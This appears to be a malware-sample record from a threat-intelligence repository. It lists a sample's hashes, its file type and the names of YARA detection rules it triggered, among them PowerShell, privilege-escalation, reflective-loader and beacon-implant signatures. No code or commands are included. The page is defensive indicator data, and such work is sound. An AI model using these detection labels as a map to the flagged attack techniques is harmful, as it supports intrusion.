Sample details: 4c8471847ccd4d26e841ce03ecd21348

Hashes
MD5: 4c8471847ccd4d26e841ce03ecd21348
SHA1: c38657fc0702eb24b7b3568c431387d2a3408dae
SHA256: 1b98e9ee92f90530743c0e79b9d9d1630c4e43b1241caf8bd13a27f6694f9777
SSDEEP: 3072:ZZrNm0q1UmGTUVjsY9vsVfYLVthu1aYYp1V92R1n6/0IU1Danu6BR:ZqV+KDCVfenh+Qfg2/0Van1
Details
File Type: MS-DOS
Added: 2019-01-21 21:02:47
Yara Hits
YRP/Visual_Cpp_2005_DLL_Microsoft
YRP/Visual_Cpp_2003_DLL_Microsoft
YRP/IsPE32
YRP/IsDLL
YRP/IsWindowsGUI
YRP/IsBeyondImageSize
YRP/HasModified_DOS_Message
YRP/powershell
YRP/maldoc_find_kernel32_base_method_1
YRP/maldoc_getEIP_method_1
YRP/domain
YRP/IP
YRP/url
YRP/contentis_base64
YRP/escalate_priv
YRP/win_registry
YRP/Prime_Constants_long
YRP/RijnDael_AES
YRP/BASE64_table
YRP/VC8_Random
FlorianRoth/PowerShell_Susp_Parameter_Combo
FlorianRoth/WiltedTulip_ReflectiveLoader
FlorianRoth/ReflectiveLoader
FlorianRoth/Beacon_K5om
Strings